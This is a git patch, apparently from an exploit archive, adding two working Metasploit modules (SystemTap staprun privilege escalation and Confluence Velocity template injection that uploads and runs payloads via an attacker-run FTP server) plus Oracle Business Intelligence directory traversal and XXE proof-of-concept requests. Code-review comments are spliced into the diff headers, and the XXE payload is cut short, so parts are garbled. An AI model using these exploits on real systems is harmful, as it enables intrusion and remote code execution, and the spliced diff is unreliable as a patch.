From aaf10d856640906daa7be039773691d14d8269bc Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 20 Apr 2019 05:01:59 +0000
Subject: [PATCH] DB: 2019-04-20
4 changes to exploits/shellcodes
SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)
Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)
Oracle Business Intelligence 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - Directory Traversal
Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection
---
 exploits/linux/local/46730.rb | 142 +++++++++
 exploits/multiple/remote/46731.rb | 465 +++++++++++++++++++++++++++++
 exploits/windows/webapps/46728.txt | 13 +
 exploits/windows/webapps/46729.txt | 22 ++
 files_exploits.csv | 4 +
 5 files changed, 646 insertions(+)
 create mode 100755 exploits/linux/local/46730.rb
 create mode 100755 exploits/multiple/remote/46731.rb
 create mode 100644 exploits/windows/webapps/46728.txt
 create mode 100644 exploits/windows/webapps/46729.txt
diff --git a/exploits/linux/local/46730.rb b/exploits/linux/local/46730.rb
new file mode 100755
index 000000000..b58d7b0dc
--- /dev/null
+++ b/exploits/linux/local/46730.rb
@@ -0,0 +1,142 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ include Msf::Post::File
+ include Msf::Post::Linux::Priv
+ include Msf::Post::Linux::System
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'SystemTap MODPROBE_OPTIONS Privilege Escalation',
+ 'Description' => %q{
+ This module attempts to gain root privileges by exploiting a
+ vulnerability in the `staprun` executable included with SystemTap
+ version 1.3.
+
+ The `staprun` executable does not clear environment variables prior to
+ executing `modprobe`, allowing an arbitrary configuration file to be
+ specified in the `MODPROBE_OPTIONS` environment variable, resulting
+ in arbitrary command execution with root privileges.
+
+ This module has been tested successfully on:
+
+ systemtap 1.2-1.fc13-i686 on Fedora 13 (i686); and
+ systemtap 1.1-3.el5 on RHEL 5.5 (x64).
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Tavis Ormandy', # Discovery and exploit
+ 'bcoles' # Metasploit
+ ],
+ 'DisclosureDate' => '2010-11-17',
+ 'References' =>
+ [
+ ['BID', '44914'],
+ ['CVE', '2010-4170'],
+ ['EDB', '15620'],
+ ['URL', 'https://securitytracker.com/id?1024754'],
+ ['URL', 'https://access.redhat.com/security/cve/cve-2010-4170'],
+ ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=653604'],
+ ['URL', 'https://lists.fedoraproject.org/pipermail/package-announce/2010-November/051115.html'],
+ ['URL', 'https://bugs.launchpad.net/bugs/677226'],
+ ['URL', 'https://www.debian.org/security/2011/dsa-2348']
+ ],
+ 'Platform' => ['linux'],
+ 'Arch' =>
+ [
+ ARCH_X86,
+ ARCH_X64,
+ ARCH_ARMLE,
+ ARCH_AARCH64,
+ ARCH_PPC,
+ ARCH_MIPSLE,
+ ARCH_MIPSBE
+ ],
+ 'SessionTypes' => ['shell', 'meterpreter'],
+ 'Targets' => [['Auto', {}]],
+ 'DefaultTarget' => 0))
+ register_options [
+ OptString.new('STAPRUN_PATH', [true, 'Path to staprun executable', '/usr/bin/staprun'])
+ ]
+ register_advanced_options [
+ OptBool.new('ForceExploit', [false, 'Override check result', false]),
+ OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+ ]
+ end
+
+ def staprun_path
+ datastore['STAPRUN_PATH']
+ end
+
+ def base_dir
+ datastore['WritableDir'].to_s
+ end
+
+ def upload(path, data)
+ print_status "Writing '#{path}' (#{data.size} bytes) ..."
+ rm_f path
+ write_file path, data
+ register_file_for_cleanup path
+ end
+
+ def upload_and_chmodx(path, data)
+ upload path, data
+ chmod path
+ end
+
+ def check
+ # On some systems, staprun execution is restricted to stapusr group:
+ # ---s--x---. 1 root stapusr 178488 Mar 28 2014 /usr/bin/staprun
+ unless cmd_exec("test -x '#{staprun_path}' && echo true").include? 'true'
+ vprint_error "#{staprun_path} is not executable"
+ return CheckCode::Safe
+ end
+ vprint_good "#{staprun_path} is executable"
+
+ unless setuid? staprun_path
+ vprint_error "#{staprun_path} is not setuid"
+ return CheckCode::Safe
+ end
+ vprint_good "#{staprun_path} is setuid"
+
+ CheckCode::Detected
+ end
+
+ def exploit
+ unless check == CheckCode::Detected
+ unless datastore['ForceExploit']
+ fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+ end
+ print_warning 'Target does not appear to be vulnerable'
+ end
+
+ if is_root?
+ unless datastore['ForceExploit']
+ fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
+ end
+ end
+
+ unless writable? base_dir
+ fail_with Failure::BadConfig, "#{base_dir} is not writable"
+ end
+
+ payload_name = ".#{rand_text_alphanumeric 10..15}"
+ payload_path = "#{base_dir}/#{payload_name}"
+ upload_and_chmodx payload_path, generate_payload_exe
+
+ config_path = "#{base_dir}/#{payload_name}.conf"
+ upload config_path, "install uprobes /bin/sh"
+
+ print_status 'Executing payload...'
+ res = cmd_exec "echo '#{payload_path}&' | MODPROBE_OPTIONS='-C #{config_path}' #{staprun_path} -u #{rand_text_alphanumeric 10..15}"
+ vprint_line res
+ end
+end
\ No newline at end of file
diff --git a/exploits/multiple/remote/46731.rb b/exploits/multiple/remote/46731.rb
new file mode 100755
index 000000000..3c68146c1
--- /dev/null
+++ b/exploits/multiple/remote/46731.rb
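Review bot: `check` returns `CheckCode::Detected` as soon as `staprun` is executable and setuid, without ever reading the installed SystemTap version, so a host that already carries the vendor fix would presumably still be reported as Detected. The description adds to the ambiguity, since it names only version 1.3 while the tested list gives 1.1 and 1.2; the affected range should be stated once there. Above the final return in `check` I would add `# Only confirms staprun is present and setuid; the SystemTap version is not checked, so patched hosts also report Detected.` Separately, the `if is_root?` branch in `exploit` is silent when ForceExploit is set; a `print_warning` there, matching the branch above it, would make the override visible in the output.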
@@ -0,0 +1,465 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Remote::FtpServer
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Atlassian Confluence Widget Connector Macro Velocity Template Injection",
+ 'Description' => %q{
+ Widget Connector Macro is part of Atlassian Confluence Server and Data Center that
+ allows embed online videos, slideshows, photostreams and more directly into page.
+ A _template parameter can be used to inject remote Java code into a Velocity template,
+ and gain code execution. Authentication is unrequired to exploit this vulnerability.
+ By default, Java payload will be used because it is cross-platform, but you can also
+ specify which native payload you want (Linux or Windows).
+
+ Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version
+ 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected.
+
+ This vulnerability was originally discovered by Daniil Dmitriev
+ https://twitter.com/ddv_ua.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Daniil Dmitriev', # Discovering vulnerability
+ 'Dmitry (rrock) Shchannikov' # Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2019-3396' ],
+ [ 'URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html' ],
+ [ 'URL', 'https://chybeta.github.io/2019/04/06/Analysis-for-【CVE-2019-3396】-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/'],
+ [ 'URL', 'https://paper.seebug.org/886/']
+ ],
+ 'Targets' =>
+ [
+ [ 'Java', { 'Platform' => 'java', 'Arch' => ARCH_JAVA }],
+ [ 'Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 }],
+ [ 'Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86 }]
+ ],
+ 'DefaultOptions' =>
+ {
+ 'RPORT' => 8090,
+ 'SRVPORT' => 8021,
+ },
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Mar 25 2019',
+ 'DefaultTarget' => 0,
+ 'Stance' => Msf::Exploit::Stance::Aggressive
+ ))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The base to Confluence', '/']),
+ OptString.new('TRIGGERURL', [true, 'Url to external video service to trigger vulnerability',
+ 'https://www.youtube.com/watch?v=dQw4w9WgXcQ'])
+ ])
+ end
+
+ # Handles ftp RETP command.
+ #
+ # @param c [Socket] Control connection socket.
+ # @param arg [String] RETR argument.
+ # @return [void]
+ def on_client_command_retr(c, arg)
+ vprint_status("FTP download request for #{arg}")
+ conn = establish_data_connection(c)
+ if(not conn)
+ c.put("425 Can't build data connection\r\n")
+ return
+ end
+
+ c.put("150 Opening BINARY mode data connection for #{arg}\r\n")
+ case arg
+ when /check\.vm$/
+ conn.put(wrap(get_check_vm))
+ when /javaprop\.vm$/
+ conn.put(wrap(get_javaprop_vm))
+ when /upload\.vm$/
+ conn.put(wrap(get_upload_vm))
+ when /exec\.vm$/
+ conn.put(wrap(get_exec_vm))
+ else
+ conn.put(wrap(get_dummy_vm))
+ end
+ c.put("226 Transfer complete.\r\n")
+ conn.close
+ end
+
+ # Handles ftp PASS command to suppress output.
+ #
+ # @param c [Socket] Control connection socket.
+ # @param arg [String] PASS argument.
+ # @return [void]
+ def on_client_command_pass(c, arg)
+ @state[c][:pass] = arg
+ vprint_status("#{@state[c][:name]} LOGIN #{@state[c][:user]} / #{@state[c][:pass]}")
+ c.put "230 Login OK\r\n"
+ end
+
+ # Handles ftp EPSV command to suppress output.
+ #
+ # @param c [Socket] Control connection socket.
+ # @param arg [String] EPSV argument.
+ # @return [void]
+ def on_client_command_epsv(c, arg)
+ vprint_status("#{@state[c][:name]} UNKNOWN 'EPSV #{arg}'")
+ c.put("500 'EPSV #{arg}': command not understood.\r\n")
+ end
+
+ # Returns a upload template.
+ #
+ # @return [String]
+ def get_upload_vm
+ (
+ <<~EOF
+ $i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{@fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{@b64}'))
+ EOF
+ )
+ end
+
+ # Returns a command execution template.
+ #
+ # @return [String]
+ def get_exec_vm
+ (
+ <<~EOF
+ $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{@command}').waitFor()
+ EOF
+ )
+ end
+
+ # Returns checking template.
+ #
+ # @return [String]
+ def get_check_vm
+ (
+ <<~EOF
+ #{@check_text}
+ EOF
+ )
+ end
+
+ # Returns Java's getting property template.
+ #
+ # @return [String]
+ def get_javaprop_vm
+ (
+ <<~EOF
+ $i18n.getClass().forName('java.lang.System').getMethod('getProperty', $i18n.getClass().forName('java.lang.String')).invoke(null, '#{@prop}').toString()
+ EOF
+ )
+ end
+
+ # Returns dummy template.
+ #
+ # @return [String]
+ def get_dummy_vm
+ (
+ <<~EOF
+ EOF
+ )
+ end
+
+ # Checks the vulnerability.
+ #
+ # @return [Array] Check code
+ def check
+ checkcode = Exploit::CheckCode::Safe
+ begin
+ # Start the FTP service
+ print_status("Starting the FTP server.")
+ start_service
+
+ @check_text = Rex::Text.rand_text_alpha(5..10)
+ res = inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}check.vm")
+ if res && res.body && res.body.include?(@check_text)
+ checkcode = Exploit::CheckCode::Vulnerable
+ end
+ rescue Msf::Exploit::Failed => e
+ vprint_error(e.message)
+ checkcode = Exploit::CheckCode::Unknown
+ end
+ checkcode
+ end
+
+ # Injects Java code to the template.
+ #
+ # @param service_url [String] Address of template to injection.
+ # @return [void]
+ def inject_template(service_url, timeout=20)
+
+ uri = normalize_uri(target_uri.path, 'rest', 'tinymce', '1', 'macro', 'preview')
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => uri,
+ 'headers' => {
+ 'Accept' => '*/*',
+ 'Origin' => full_uri(vhost_uri: true)
+ },
+ 'ctype' => 'application/json; charset=UTF-8',
+ 'data' => {
+ 'contentId' => '1',
+ 'macro' => {
+ 'name' => 'widget',
+ 'body' => '',
+ 'params' => {
+ 'url' => datastore['TRIGGERURL'],
+ '_template' => service_url
+ }
+
+ }
+ }.to_json
+ }, timeout=timeout)
+
+ unless res
+ unless service_url.include?("exec.vm")
+ print_warning('Connection timed out in #inject_template')
+ end
+ return
+ end
+
+ if res.body.include? 'widget-error'
+ print_error('Failed to inject and execute code:')
+ else
+ vprint_status("Server response:")
+ end
+
+ vprint_line(res.body)
+
+ res
+ end
+
+ # Returns a system property for Java.
+ #
+ # @param prop [String] Name of the property to retrieve.
+ # @return [String]
+ def get_java_property(prop)
+ @prop = prop
+ res = inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}javaprop.vm")
+ if res && res.body
+ return clear_response(res.body)
+ end
+ ''
+ end
+
+ # Returns the target platform.
+ #
+ # @return [String]
+ def get_target_platform
+ return get_java_property('os.name')
+ end
+
+ # Checks if the target os/platform is compatible with the module target or not.
+ #
+ # @return [TrueClass] Compatible
+ # @return [FalseClass] Not compatible
+ def target_platform_compat?(target_platform)
+ target.platform.names.each do |n|
+ if n.downcase == 'java' || target_platform.downcase.include?(n.downcase)
+ return true
+ end
+ end
+
+ false
+ end
+
+ # Returns a temp path from the remote target.
+ #
+ # @return [String]
+ def get_tmp_path
+ return get_java_property('java.io.tmpdir')
+ end
+
+ # Returns the Java home path used by Confluence.
+ #
+ # @return [String]
+ def get_java_home_path
+ return get_java_property('java.home')
+ end
+
+ # Returns Java code that can be used to inject to the template in order to copy a file.
+ #
+ # @note The purpose of this method is to have a file that is not busy, so we can execute it.
+ # It is meant to be used with #get_write_file_code.
+ #
+ # @param fname [String] The file to copy
+ # @param new_fname [String] The new file
+ # @return [void]
+ def get_dup_file_code(fname, new_fname)
+ if fname =~ /^\/[[:print:]]+/
+ @command = "cp #{fname} #{new_fname}"
+ else
+ @command = "cmd.exe /C copy #{fname} #{new_fname}"
+ end
+
+ inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm")
+ end
+
+ # Returns the normalized file path for payload.
+ #
+ # @return [String]
+ def normalize_payload_fname(tmp_path, fname)
+ # A quick way to check platform insteaf of actually grabbing os.name in Java system properties.
+ if /^\/[[:print:]]+/ === tmp_path
+ Rex::FileUtils.normalize_unix_path(tmp_path, fname)
+ else
+ Rex::FileUtils.normalize_win_path(tmp_path, fname)
+ end
+ end
+
+ # Exploits the target in Java platform.
+ #
+ # @return [void]
+ def exploit_as_java
+
+ tmp_path = get_tmp_path
+
+ if tmp_path.blank?
+ fail_with(Failure::Unknown, 'Unable to get the temp path.')
+ end
+
+ @fname = normalize_payload_fname(tmp_path, "#{Rex::Text.rand_text_alpha(5)}.jar")
+ @b64 = Rex::Text.encode_base64(payload.encoded_jar)
+ @command = ''
+
+ java_home = get_java_home_path
+
+ if java_home.blank?
+ fail_with(Failure::Unknown, 'Unable to find java home path on the remote machine.')
+ else
+ vprint_status("Found Java home path: #{java_home}")
+ end
+
+ register_files_for_cleanup(@fname)
+
+ if /^\/[[:print:]]+/ === @fname
+ normalized_java_path = Rex::FileUtils.normalize_unix_path(java_home, '/bin/java')
+ @command = %Q|#{normalized_java_path} -jar #{@fname}|
+ else
+ normalized_java_path = Rex::FileUtils.normalize_win_path(java_home, '\\bin\\java.exe')
+ @fname.gsub!(/Program Files/, 'PROGRA~1')
+ @command = %Q|cmd.exe /C "#{normalized_java_path}" -jar #{@fname}|
+ end
+
+ print_status("Attempting to upload #{@fname}")
+ inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
+
+ print_status("Attempting to execute #{@fname}")
+ inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5)
+ end
+
+
+ # Exploits the target in Windows platform.
+ #
+ # @return [void]
+ def exploit_as_windows
+ tmp_path = get_tmp_path
+
+ if tmp_path.blank?
+ fail_with(Failure::Unknown, 'Unable to get the temp path.')
+ end
+
+ @b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))
+ @fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe")
+ new_fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe")
+ @fname.gsub!(/Program Files/, 'PROGRA~1')
+ new_fname.gsub!(/Program Files/, 'PROGRA~1')
+ register_files_for_cleanup(@fname, new_fname)
+
+ print_status("Attempting to upload #{@fname}")
+ inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
+
+ print_status("Attempting to copy payload to #{new_fname}")
+ get_dup_file_code(@fname, new_fname)
+
+ print_status("Attempting to execute #{new_fname}")
+ @command = new_fname
+ inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5)
+ end
+
+
+ # Exploits the target in Linux platform.
+ #
+ # @return [void]
+ def exploit_as_linux
+ tmp_path = get_tmp_path
+
+ if tmp_path.blank?
+ fail_with(Failure::Unknown, 'Unable to get the temp path.')
+ end
+
+ @b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))
+ @fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(5))
+ new_fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(6))
+ register_files_for_cleanup(@fname, new_fname)
+
+ print_status("Attempting to upload #{@fname}")
+ inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
+
+ @command = "chmod +x #{@fname}"
+ inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm")
+
+ print_status("Attempting to copy payload to #{new_fname}")
+ get_dup_file_code(@fname, new_fname)
+
+ print_status("Attempting to execute #{new_fname}")
+ @command = new_fname
+ inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5)
+ end
+
+ def exploit
+ @wrap_marker = Rex::Text.rand_text_alpha(5..10)
+
+ # Start the FTP service
+ print_status("Starting the FTP server.")
+ start_service
+
+ target_platform = get_target_platform
+ if target_platform.nil?
+ fail_with(Failure::Unreachable, 'Target did not respond to OS check. Confirm RHOSTS and RPORT, then run "check".')
+ else
+ print_status("Target being detected as: #{target_platform}")
+ end
+
+ unless target_platform_compat?(target_platform)
+ fail_with(Failure::BadConfig, 'Selected module target does not match the actual target.')
+ end
+
+ case target.name.downcase
+ when /java$/
+ exploit_as_java
+ when /windows$/
+ exploit_as_windows
+ when /linux$/
+ exploit_as_linux
+ end
+ end
+
+ # Wraps request.
+ #
+ # @return [String]
+ def wrap(string)
+ "#{@wrap_marker}\n#{string}#{@wrap_marker}\n"
+ end
+
+ # Returns unwrapped response.
+ #
+ # @return [String]
+ def clear_response(string)
+ if match = string.match(/#{@wrap_marker}\n(.*)\n#{@wrap_marker}\n/m)
+ return match.captures[0]
+ end
+ end
+end
\ No newline at end of file
diff --git a/exploits/windows/webapps/46728.txt b/exploits/windows/webapps/46728.txt
new file mode 100644
index 000000000..45e62a085
--- /dev/null
+++ b/exploits/windows/webapps/46728.txt
@@ -0,0 +1,13 @@
+# Exploit Title: Directory traversal in Oracle Business Intelligence
+# Date: 16.04.19
+# Exploit Author: @vah_13
+# Vendor Homepage: http://oracle.com
+# Software Link:
+https://www.oracle.com/technetwork/middleware/bi-enterprise-edition/downloads/index.html
+# Version: 11.1.1.9.0, 12.2.1.3.0, 12.2.1.4.0
+# Tested on: Windows
+# CVE : CVE-2019-2588
+
+PoC
+
+http://server:9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini
\ No newline at end of file
diff --git a/exploits/windows/webapps/46729.txt b/exploits/windows/webapps/46729.txt
new file mode 100644
index 000000000..a24557ee9
--- /dev/null
+++ b/exploits/windows/webapps/46729.txt
@@ -0,0 +1,22 @@
+# Exploit Title: XXE in Oracle Business Intelligence and XML Publisher
+# Date: 16.04.19
+# Exploit Author: @vah_13
+# Vendor Homepage: http://oracle.com
+# Software Link:
+https://www.oracle.com/technetwork/middleware/bi-enterprise-edition/downloads/index.html
+# Version: 11.1.1.9.0, 12.2.1.3.0, 12.2.1.4.0
+# Tested on: Windows
+# CVE : CVE-2019-2616 (7.2/10)
+
+PoC:
+
+POST /xmlpserver/ReportTemplateService.xls HTTP/1.1
+Host: host
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101
+Firefox/62.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Content-Length: 76
+Content-Type: text/xml; charset=UTF-8
+
+
+">
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 3e83dcf72..ac809f009 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
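Review bot: `inject_template` is documented `@return [void]` and has no `@param` for `timeout`, yet it returns the HTTP response (or nil when the request times out) and `check` and `get_java_property` read `res.body` from it; the doc comment should carry `# @param timeout [Integer] Seconds to wait for the response.` and `# @return [Rex::Proto::Http::Response, nil]`. The `timeout=timeout` in the `send_request_cgi` call and the `timeout=5` at the call sites in `exploit_as_java`, `exploit_as_windows` and `exploit_as_linux` are local assignments, not keyword arguments; they work only because the assigned value is then passed positionally, so plain `}, timeout)` and `..., 5)` say what actually happens. Two smaller doc slips in the same file: the comment on `on_client_command_retr` says "RETP" where RETR is meant, and `clear_response` is documented `@return [String]` but returns nil when the marker is absent, which is the case the `target_platform.nil?` test in `exploit` relies on.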
@@ -10428,6 +10428,7 @@ id,file,description,date,author,type,platform,port
 46717,exploits/windows/local/46717.txt,"Microsoft Windows 10 1809 - LUAFV Delayed Virtualization Cache Manager Poisoning Privilege Escalation",2019-04-16,"Google Security Research",local,windows,
 46718,exploits/windows/local/46718.txt,"Microsoft Windows 10 1809 - LUAFV PostLuafvPostReadWrite SECTION_OBJECT_POINTERS Race Condition Privilege Escalation",2019-04-16,"Google Security Research",local,windows,
 46727,exploits/multiple/local/46727.rb,"LibreOffice < 6.0.7 / 6.1.3 - Macro Code Execution (Metasploit)",2019-04-18,Metasploit,local,multiple,
+46730,exploits/linux/local/46730.rb,"SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)",2019-04-19,Metasploit,local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17344,6 +17345,7 @@ id,file,description,date,author,type,platform,port
 46705,exploits/hardware/remote/46705.rb,"Cisco RV130W Routers - Management Interface Remote Command Execution (Metasploit)",2019-04-15,Metasploit,remote,hardware,
 46719,exploits/windows/remote/46719.py,"MailCarrier 2.51 - POP3 'RETR' SEH Buffer Overflow",2019-04-17,"Dino Covotsos",remote,windows,110
 46725,exploits/windows/remote/46725.rb,"ManageEngine Applications Manager 11.0 < 14.0 - SQL Injection / Remote Code Execution (Metasploit)",2019-04-18,AkkuS,remote,windows,
+46731,exploits/multiple/remote/46731.rb,"Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)",2019-04-19,Metasploit,remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41162,3 +41164,5 @@ id,file,description,date,author,type,platform,port
 46694,exploits/php/webapps/46694.txt,"DirectAdmin 1.561 - Multiple Vulnerabilities",2019-04-15,InfinitumIT,webapps,php,
 46706,exploits/hardware/webapps/46706.txt,"Zyxel ZyWall 310 / ZyWall 110 / USG1900 / ATP500 / USG40 - Login Page Cross-Site Scripting",2019-04-16,"Aaron Bishop",webapps,hardware,80
 46710,exploits/php/webapps/46710.py,"Joomla Core 1.5.0 - 3.9.4 - Directory Traversal / Authenticated Arbitrary File Deletion",2019-04-16,"Haboob Team",webapps,php,80
+46728,exploits/windows/webapps/46728.txt,"Oracle Business Intelligence 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - Directory Traversal",2019-04-19,"Vahagn Vardanyan",webapps,windows,
+46729,exploits/windows/webapps/46729.txt,"Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection",2019-04-19,"Vahagn Vardanyan",webapps,windows,